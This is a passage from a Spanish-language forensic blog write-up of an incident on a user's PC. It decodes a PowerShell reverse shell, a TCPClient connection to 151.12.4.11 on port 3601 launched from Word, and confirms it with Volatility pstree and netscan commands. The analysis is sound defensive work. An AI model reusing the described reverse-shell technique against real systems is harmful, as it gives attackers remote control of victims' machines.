página web base64decode.org y lo pegamos aquí para descifrarlo.</p><p class="MsoNormal"><o:p></o:p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi_UfLqLUQ5kvRyZzlg2V7mwQ35cqw-nShVHJp88h0b1RByDEEKKl6GA5vMIHgvjvK1VN7K48lJf_0an_DCeT4dduf9lbZSjPESdmeuKug6iG5Z8oh89eGMoRTq0ZctmqqYU_129zvGW_8z0eDH6mAwEyOKD2famSRpBryf08eA5zJ5Vn5O9Z37-5FmLms/s567/Imagen17.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="332" data-original-width="567" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi_UfLqLUQ5kvRyZzlg2V7mwQ35cqw-nShVHJp88h0b1RByDEEKKl6GA5vMIHgvjvK1VN7K48lJf_0an_DCeT4dduf9lbZSjPESdmeuKug6iG5Z8oh89eGMoRTq0ZctmqqYU_129zvGW_8z0eDH6mAwEyOKD2famSRpBryf08eA5zJ5Vn5O9Z37-5FmLms/s16000/Imagen17.png" /></a></div><p></p>
<br /><br /><div style="text-align: justify;">Si miramos detenidamente el string resultante se puede apreciar que se crea un objeto de red en el que se establece un socket de conexión System.Net.Sockets.TCPClient("151.12.4.11",3601) hacia la dirección IP 151.12.4.11 al puerto 3601 (justamente la dirección IP que aparecía en el archivo cports.html) otorgando una Shell en Powershell de la máquina de Raúl, es decir, una Shell Reversa con la que el atacante ha obtenido el control de la máquina de Raúl.</div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">También hemos revisado los eventos de seguridad del sistema de Raúl alojados en el archivo Security.evtx en el que no hemos visto conexiones entrantes hacia la máquina de Raúl, ni sesiones abiertas remotamente, ni creación de usuarios extraños dentro del sistema, lo que nos confirma que ha sido la máquina de Raúl la que se ha debido de conectar a la máquina del atacante ofreciéndole una Shell de Powershell.</div><div style="text-align: justify;"><br /></div> <div style="text-align: justify;"><br /></div>
<span style="font-size: medium;"><div style="text-align: justify;"><b>Análisis de evidencias. Memoria:</b></div></span><div style="text-align: justify;"><br /></div><div style="text-align: justify;">Para analizar el volcado de memoria de la máquina de Raúl vamos a utilizar la herramienta Volatility concretamente la versión Stand Alone executable que se puede descargar aquí <a href="http://downloads.volatilityfoundation.org/releases/2.6/volatility_2.6_win64_standalone.zip">http://downloads.volatilityfoundation.org/releases/2.6/volatility_2.6_win64_standalone.zip</a></div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">Volatility es una herramienta forense de análisis de memoria desarrollada en Python, lo que permite que pueda ser utilizada en cualquier plataforma que tenga Python instalado.</div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">En este caso forense, vamos a usar la versión Stand Alone porque no necesitamos añadir plugins adicionales y no es necesario instalar Python para usarla.</div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">Lo primero que se debe hacer para comenzar a analizar un volcado de memoria con Volatility es hallar el perfil del sistema operativo instalado, para ello Volatility cuenta con el comando “imageinfo”.</div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">La sintaxis del comando sería la siguiente:</div><div style="text-align: justify;"><br /></div><div style="text-align: left;">volatility.exe -f RAUL-PC_20220607_152508_mem.dmp imageinfo. </div><div style="text-align: left;"><br /></div><div style="text-align: justify;">
<span style="font-size: x-small;">*Nota: La opción -f RAUL-PC_20220607_152508_mem.dmp, sirve para indicar la ruta del volcado de memoria.</span></div><div style="text-align: justify;"><span style="font-size: x-small;"><br /></span></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIWFD4sDfy3t50JXELT8ygJ_mxRcAxl7VKs6tS4LTUP5JCHaD6jGFrsyA9oEMGw9lL1GqFFjrfkhII4eQRW81gBOeI9YV8ZULBQ7uESwIL5a5NmRPFNgTAQmj_nJPsJB5cDwYUtCIoPoYeS8aoGjpfV8q7KfK3curte5PHzKCD4-f4tQrFyVcYNBveo-U/s567/Imagen18.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="133" data-original-width="567" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIWFD4sDfy3t50JXELT8ygJ_mxRcAxl7VKs6tS4LTUP5JCHaD6jGFrsyA9oEMGw9lL1GqFFjrfkhII4eQRW81gBOeI9YV8ZULBQ7uESwIL5a5NmRPFNgTAQmj_nJPsJB5cDwYUtCIoPoYeS8aoGjpfV8q7KfK3curte5PHzKCD4-f4tQrFyVcYNBveo-U/s16000/Imagen18.png" /></a></div><span style="font-size: x-small;"><br /></span><div style="text-align: justify;">El resultado nos arroja cuatro posibles perfiles, en este caso nos vamos a quedar con el perfil Win10x64_10586</div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">Una vez obtenido el perfil vamos a continuar analizando la memoria en busca de los procesos en ejecución, si recordamos al principio del caso forense teníamos un proceso de Powershell con PID 360, el cual no sabemos cuál era su origen, es decir, su proceso padre. Para obtener un árbol de procesos en donde aparezcan los procesos clasificados utilizaremos el comando pstree y la salida del comando la vamos a mandar a un fichero que nos facilite su lectura.</div><div style="text-align: justify;"><br /></div><div style="text-align: left;">La sintaxis del comando sería la siguiente: volatility.exe -f RAUL-PC_20220607_152508_mem.dmp --profile=Win10x64_10586 pstree > pstree.txt</div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">Una vez obtenida la salida de pstree podemos observar que el proceso powershell.exe PID:360 es hijo del proceso WINDWORD.EXE con PID 3304.</div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">La interpretación de lo anterior es que el usuario hizo uso de la aplicación WORD para abrir un archivo y a continuación se ejecutó el proceso powershell.exe, algo muy sospechoso.</div><div style="text-align: justify;"><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiR0oJv9oe41yDytlTueKFeFO4jFpKdOvckbgMPAHvf64IFlpE3nB5-mDGQWnmofVEsktiHfSGD3uXP7zjLo2UaNRhuftpxamdzVT-1JcickwO76GjLy4phkT2O83XGSOboSzC24aoBTVlZSyjxkfyH33WSiPHxpdo_PGZvDr7ZOqUFvSI4Uoi5m4TrK1g/s567/Imagen19.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="333" data-original-width="567" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiR0oJv9oe41yDytlTueKFeFO4jFpKdOvckbgMPAHvf64IFlpE3nB5-mDGQWnmofVEsktiHfSGD3uXP7zjLo2UaNRhuftpxamdzVT-1JcickwO76GjLy4phkT2O83XGSOboSzC24aoBTVlZSyjxkfyH33WSiPHxpdo_PGZvDr7ZOqUFvSI4Uoi5m4TrK1g/s16000/Imagen19.png" /></a></div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">A continuación, echamos un vistazo a las conexiones de red. Mirar las conexiones de red dentro de la memoria tiene la ventaja de que pueden quedar registros de conexiones que han sido cerradas y que no aparecen en los archivos de los triages.</div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">Para ello ejecutamos el comando netscan y lo mandamos a fichero de la siguiente forma:</div><div style="text-align: justify;"><br /></div><div style="text-align: left;">volatility.exe -f RAUL-PC_20220607_152508_mem.dmp --profile=Win10x64_10586 netscan > netscan.txt</div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">De los registros que obtenemos podemos apreciar la conexión powershell contra la IP 151.12.4.11 al puerto 3601 y adicionalmente otra conexión a la IP 151.12.4.11 al puerto 21 la cual puede estar relacionada a la ejecución del <a href="ftp://ftp.exe/">ftp.exe</a> nativo de Windows que vimos en el archivo LastActivityView.html</div><p class="MsoNormal"><!--[if gte vml 1]><v:rect id="Rectangle_x0020_46" o:spid="_x0000_s1027"
style='position:absolute;margin-left:0;margin-top:114.5pt;width:420.35pt;
height:6.65pt;z-index:251673600;visibility:visible;mso-wrap-style:square;
mso-wrap-distance-left:9pt;mso-wrap-distance-top:0;mso-wrap-distance-right:9pt;
mso-wrap-distance-bottom:0;mso-position-horizontal:left;
mso-position-horizontal-relative:margin;mso-position-vertical:absolute;
mso-position-vertical-relative:text;v-text-anchor:middle' o:gfxdata="UEsDBBQABgAIAAAAIQC75UiUBQEAAB4CAAATAAAAW0NvbnRlbnRfVHlwZXNdLnhtbKSRvU7DMBSF
dyTewfKKEqcMCKEmHfgZgaE8wMW+SSwc27JvS/v23KTJgkoXFsu+P+c7Ol5vDoMTe0zZBl/LVVlJ
gV4HY31Xy4/tS3EvRSbwBlzwWMsjZrlprq/W22PELHjb51r2RPFBqax7HCCXIaLnThvSAMTP1KkI
+gs6VLdVdad08ISeCho1ZLN+whZ2jsTzgcsnJwldluLxNDiyagkxOquB2Knae/OLUsyEkjenmdzb
mG/YhlRnCWPnb8C898bRJGtQvEOiVxjYhtLOxs8AySiT4JuDystlVV4WPeM6tK3VaILeDZxIOSsu
ti/jidNGNZ3/J08yC1dNv9v8AAAA//8DAFBLAwQUAAYACAAAACEArTA/8cEAAAAyAQAACwAAAF9y
ZWxzLy5yZWxzhI/NCsIwEITvgu8Q9m7TehCRpr2I4FX0AdZk2wbbJGTj39ubi6AgeJtl2G9m6vYx
jeJGka13CqqiBEFOe2Ndr+B03C3WIDihMzh6RwqexNA281l9oBFTfuLBBhaZ4ljBkFLYSMl6oAm5
8IFcdjofJ0z5jL0MqC/Yk1yW5UrGTwY0X0yxNwri3lQgjs+Qk/+zfddZTVuvrxO59CNCmoj3vCwj
MfaUFOjRhrPHaN4Wv0VV5OYgm1p+LW1eAAAA//8DAFBLAwQUAAYACAAAACEA+rkn8cECAABhBgAA
HwAAAGNsaXBib2FyZC9kcmF3aW5ncy9kcmF3aW5nMS54bWysVVtP2zAUfp+0/2D5HdKWFkpFQF1H
p0kIEGHi+eA4TTTH9mw3pPv1O7aTNmKISdv60PrcPn/n5l5ctbUgDTe2UjKl4+MRJVwylVdyk9Jv
j+ujOSXWgcxBKMlTuuOWXl1+/HABi40BXVaMIIK0C0hp6ZxeJIllJa/BHivNJdoKZWpwKJpNkht4
QeRaJJPR6DSpoZL08gD1GRyQran+Akoo9p3nK5ANWIQUbDHUdBwF+3dkWMjmi9GZvjeeObtt7g2p
8pRi5STUWCKadIbODcXkVdTmANAWpvb+qihIix0YzUfjkxklu5Sezc9PJ5NZxOOtIwwdZicnZ/Mx
XsbQYz6dzjo7K+/+gMDK63cxkGQkg4cBQas9Pdn8nvH0tE/5gTOckY3gBHV9+j6gz70Ptl3Z/k/W
e8aw0Ma6L1zVxB9SapBQmCxobqyLLHqXkI5aV0IEpkJ6hVWiyr0uCGbzvBKGNCBSul6P8OOzwusG
bij5UK/sknJtFmrl2k8q33mgZ/zF8TAKKWHLrGbrCvndgHX3YHBlUInL5+7wqxDqJaVMVJqSUpmf
r3XeD8cXLZS84Oql1P7YguGUiK/SpvR8PJ0inAvCdHY2QcEMLc9Di9zWK4XZjQOrcPT+TvTHwqj6
SZl86W9FE0iGdyNBZ3ph5VBGE24448tlODNVa3A3MtO4a+PQAl/3x/YJjO6a43CWb1VWguZv9Sj6
xi4tt04VVdfAWE1vENZlbid4aGCoOZe5r+gDVlvgJKaU26PrrOsaemCbDm3ZWp5pP7OxqX3frIcM
8PKBF7jUuG6TwDA8aXw/EsAYly5mZ0vIeZyU2XBQ/CPoI8LVwgN65AInbI/dAfSeEaTHjtQ6fx/K
iwIZ74NH7xGLwfuIcLOSh+C6ksq8BSAwq+7m6B8HPBYmjDoqXj2uwaX7M/Av+FC+/AUAAP//AwBQ
SwMEFAAGAAgAAAAhAJJ9h+AdBwAASSAAABoAAABjbGlwYm9hcmQvdGhlbWUvdGhlbWUxLnhtbOxZ
S28bNxC+F+h/WOy9sWS9YiNyYMly3MQvREqKHCmJ2mXMXS5Iyo5uRXLqpUCBtOihAXrroSgaoAEa
9NIfY8BBm/6IDrkvUqLiB1wgKGwBxu7sN8PhzOzM7PDO3WcR9Y4xF4TFbb96q+J7OB6xMYmDtv9o
sP3Zbd8TEsVjRFmM2/4MC//uxqef3EHrI0qSIUN8PAhxhD0QFIt11PZDKZP1lRUxAjISt1iCY3g2
YTxCEm55sDLm6AQWiOjKaqXSXIkQif0NkCiVoB6Ff7EUijCivK/EYC9GEax+MJmQEdbY8VFVIcRM
dCn3jhFt+yBzzE4G+Jn0PYqEhAdtv6L//JWNOytoPWOicgmvwbet/zK+jGF8tKrX5MGwWLReb9Sb
m4V8DaByEddr9Zq9ZiFPA9BoBDtNdbFltla79QxrgNJLh+yt1latauEN+bUFnTcb6mfhNSiVX1/A
b293wYoWXoNSfGMB3+isdbZs+RqU4psL+FZlc6vesuRrUEhJfLSArjSatW6+2wIyYXTHCV9r1Ldb
q5nwEgXRUESXWmLCYrks1iL0lPFtACggRZLEnpwleIJGEJNdRMmQE2+XBCEEXoJiJoBcWa1sV2rw
X/3q+kp7FK1jZHArvUATsUBS+nhixEki2/59kOobkLO3b0+fvzl9/vvpixenz3/N1taiLL4dFAcm
3/ufvvnn1Zfe37/9+P7lt+nS83hh4t/98tW7P/78kHjYcWmKs+9ev3vz+uz7r//6+aVD+iZHQxM+
IBEW3j4+8R6yCDbo0B8P+eU4BiEiJsdmHAgUI7WKQ35PhhZ6f4YocuA62LbjYw6pxgW8N31qKdwP
+VQSh8QHYWQB9xijHcadVnig1jLMPJjGgXtxPjVxDxE6dq3dRbHl5d40gRxLXCK7IbbUPKQolijA
MZaeesaOMHbs7gkhll33yIgzwSbSe0K8DiJOkwzI0IqmkmmHROCXmUtB8Ldlm73HXodR16638LGN
hHcDUYfyA0wtM95DU4kil8gBiqhp8F0kQ5eS/RkfmbiekODpAFPm9cZYCBfPAYf9Gk5/AGnG7fY9
OotsJJfkyCVzFzFmIrfYUTdEUeLC9kkcmtjPxRGEKPIOmXTB95j9hqh78AOKl7r7McGWu8/PBo8g
w5oqlQGinky5w5f3MLPitz+jE4RdqWaTR1aK3eTEGR2daWCF9i7GFJ2gMcbeo88dGnRYYtm8VPp+
CFllB7sC6z6yY1Xdx1hgTzc3i3lylwgrZPs4YEv02ZvNJZ4ZiiPEl0neB6+bNu9BqYtcAXBAR0cm
cJ9Avwfx4jTKgQAZRnAvlXoYIquAqXvhjtcZt/x3kXcM3sunlhoXeC+BB1+aBxK7yfNB2wwQtRYo
A2aAoMtwpVtgsdxfsqjiqtmmTr6J/dKWboDuyGp6IhKf2wHN9T6N/673gQ7j7IdXjpftevodt2Ar
WV2y01mWTHbm+ptluPmupsv4mHz8Tc0WmsaHGOrIYsa66Wluehr/f9/TLHufbzqZZf3GTSfjQ4dx
08lkw5Xr6WTK5gX6GjXwSAc9euwTLZ36TAilfTmjeFfowY+A75nxNhAVn55u4mIKmIRwqcocLGDh
Ao40j8eZ/ILIsB+iBKZDVV8JCUQmOhBewgQMjTTZKVvh6TTaY+N02FmtqsFmWlkFkiW90ijoMKiS
KbrZKgd4hXitbaAHrbkCivcyShiL2UrUHEq0cqIykh7rgtEcSuidXYsWaw4tbivxuasWtADVCq/A
B7cHn+ltv1EHFmCCeRw052Plp9TVuXe1M6/T08uMaUUANNh5BJSeXlO6Lt2e2l0aahfwtKWEEW62
EtoyusETIXwGZ9GpqBdR47K+XitdaqmnTKHXg9Aq1Wjd/pAWV/U18M3nBhqbmYLG3knbb9YaEDIj
lLT9CQyN4TJKIHaE+uZCNIDjlpHk6Qt/lcyScCG3kAhTg+ukk2aDiEjMPUqitq+2X7iBxjqHaN2q
q5AQPlrl1iCtfGzKgdNtJ+PJBI+k6XaDoiyd3kKGT3OF86lmvzpYcbIpuLsfjk+8IZ3yhwhCrNGq
KgOOiYCzg2pqzTGBw7AikZXxN1eYsrRrnkbpGErpiCYhyiqKmcxTuE7lhTr6rrCBcZftGQxqmCQr
hMNAFVjTqFY1LapGqsPSqns+k7KckTTLmmllFVU13VnMWiEvA3O2vFqRN7TKTQw5zazwaeqeT7lr
ea6b6xOKKgEGL+znqLoXKAiGauVilmpK48U0rHJ2RrVrR77Bc1S7SJEwsn4zFztnt6JGOJcD4pUq
P/DNRy2QJnlfqS3tOtjeQ4k3DKptHw6XYTj4DK7geNoH2qqirSoaXMGZM5SL9KC47WcXOQWep5QC
U8sptRxTzyn1nNLIKY2c0swpTd/TJ6pwiq8OU30vPzCFGpYdsGa9hX36v/EvAAAA//8DAFBLAwQU
AAYACAAAACEAnGZGQbsAAAAkAQAAKgAAAGNsaXBib2FyZC9kcmF3aW5ncy9fcmVscy9kcmF3aW5n
MS54bWwucmVsc4SPzQrCMBCE74LvEPZu0noQkSa9iNCr1AcIyTYtNj8kUezbG+hFQfCyMLPsN7NN
+7IzeWJMk3ccaloBQae8npzhcOsvuyOQlKXTcvYOOSyYoBXbTXPFWeZylMYpJFIoLnEYcw4nxpIa
0cpEfUBXNoOPVuYio2FBqrs0yPZVdWDxkwHii0k6zSF2ugbSL6Ek/2f7YZgUnr16WHT5RwTLpRcW
oIwGMwdKV2edNS1dgYmGff0m3gAAAP//AwBQSwECLQAUAAYACAAAACEAu+VIlAUBAAAeAgAAEwAA
AAAAAAAAAAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQCtMD/xwQAA
ADIBAAALAAAAAAAAAAAAAAAAADYBAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQD6uSfxwQIA
AGEGAAAfAAAAAAAAAAAAAAAAACACAABjbGlwYm9hcmQvZHJhd2luZ3MvZHJhd2luZzEueG1sUEsB
Ai0AFAAGAAgAAAAhAJJ9h+AdBwAASSAAABoAAAAAAAAAAAAAAAAAHgUAAGNsaXBib2FyZC90aGVt
ZS90aGVtZTEueG1sUEsBAi0AFAAGAAgAAAAhAJxmRkG7AAAAJAEAACoAAAAAAAAAAAAAAAAAcwwA
AGNsaXBib2FyZC9kcmF3aW5ncy9fcmVscy9kcmF3aW5nMS54bWwucmVsc1BLBQYAAAAABQAFAGcB
AAB2DQAAAAA=
" filled="f" strokecolor="red" strokeweight="1pt">
<w:wrap anchorx="margin"/>
</v:rect><![endif]--><!--[if !vml]--><span style="height: 11px; margin-left: 0px; margin-top: 152px; mso-ignore: vglayout; position: absolute; width: 563px; z-index: 251673600;"><br /></span><!--[endif]--><!--[if gte vml 1]><v:rect id="Rectangle_x0020_47"
o:spid="_x0000_s1026" style='position:absolute;margin-left:0;margin-top:185.05pt;
width:420.35pt;height:6.65pt;z-index:251675648;visibility:visible;
mso-wrap-style:square;mso-wrap-distance-left:9pt;mso-wrap-distance-top:0;
mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:0;
mso-position-horizontal:left;mso-position-horizontal-relative:margin;
mso-position-vertical:absolute;mso-position-vertical-relative:text;
v-text-anchor:middle' o:gfxdata="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
2jK6wRMhfAZn0amoF1Hjsr5eK11qqadModeD0CrVaN3+kBZX9TXwzecGGpuZgsbeSdtv1hoQMiOU
tP0JDI3hMkogdoT65kI0gOOWkeTpC3+VzJJwIbeQCFOD66STZoOISMw9SqK2r7ZfuIHGOodo3aqr
kBA+WuXWIK18bMqB020n48kEj6TpdoOiLJ3eQoZPc4XzqWa/Olhxsim4ux+OT7whnfKHCEKs0aoq
A46JgLODamrNMYHDsCKRlfE3V5iytGueRukYSumIJiHKKoqZzFO4TuWFOvqusIFxl+0ZDGqYJCuE
w0AVWNOoVjUtqkaqw9Kqez6TspyRNMuaaWUVVTXdWcxaIS8Dc7a8WpE3tMpNDDnNrPBp6p5PuWt5
rpvrE4oqAQYv7OeouhcoCIZq5WKWakrjxTSscnZGtWtHvsFzVLtIkTCyfjMXO2e3okY4lwPilSo/
8M1HLZAmeV+pLe062N5DiTcMqm0fDpdhOPgMruB42gfaqqKtKhpcwZkzlIv0oLjtZxc5BZ6nlAJT
yym1HFPPKfWc0sgpjZzSzClN39MnqnCKrw5TfS8/MIUalh2wZr2Fffq/8S8AAAD//wMAUEsDBBQA
BgAIAAAAIQCcZkZBuwAAACQBAAAqAAAAY2xpcGJvYXJkL2RyYXdpbmdzL19yZWxzL2RyYXdpbmcx
LnhtbC5yZWxzhI/NCsIwEITvgu8Q9m7SehCRJr2I0KvUBwjJNi02PyRR7Nsb6EVB8LIws+w3s037
sjN5YkyTdxxqWgFBp7yenOFw6y+7I5CUpdNy9g45LJigFdtNc8VZ5nKUxikkUigucRhzDifGkhrR
ykR9QFc2g49W5iKjYUGquzTI9lV1YPGTAeKLSTrNIXa6BtIvoST/Z/thmBSevXpYdPlHBMulFxag
jAYzB0pXZ501LV2BiYZ9/SbeAAAA//8DAFBLAQItABQABgAIAAAAIQC75UiUBQEAAB4CAAATAAAA
AAAAAAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAK0wP/HBAAAA
MgEAAAsAAAAAAAAAAAAAAAAANgEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAD+UQ6LAAgAA
YQYAAB8AAAAAAAAAAAAAAAAAIAIAAGNsaXBib2FyZC9kcmF3aW5ncy9kcmF3aW5nMS54bWxQSwEC
LQAUAAYACAAAACEAkn2H4B0HAABJIAAAGgAAAAAAAAAAAAAAAAAdBQAAY2xpcGJvYXJkL3RoZW1l
L3RoZW1lMS54bWxQSwECLQAUAAYACAAAACEAnGZGQbsAAAAkAQAAKgAAAAAAAAAAAAAAAAByDAAA
Y2xpcGJvYXJkL2RyYXdpbmdzL19yZWxzL2RyYXdpbmcxLnhtbC5yZWxzUEsFBgAAAAAFAAUAZwEA
AHUNAAAAAA==
" filled="f" strokecolor="red" strokeweight="1pt">
<w:wrap anchorx="margin"/>
</v:rect><![endif]--><!--[if !vml]--><span style="height: 11px; margin-left: 0px; margin-top: 246px; mso-ignore: vglayout; position: absolute; width: 563px; z-index: 251675648;"><br /></span></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEie4zC0R3RHlR2nPfoWMUWGO8CCPdSQdaFURs9AUM_68hbOxOy9TC3xE42pUHHlKnz3EbGEmrwaRGuwWNaWmbocKWvZFl5kokT-m3zXVt_8n0JMeDKTZjyHR0Jz0zpCV5G6N6UqeiyOqRrdwAEGoziUOTxw30fyvgZNU2pSZXGJAWaRVF9J47eVi0dI0YM/s567/Imagen20.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="280" data-original-width="567" 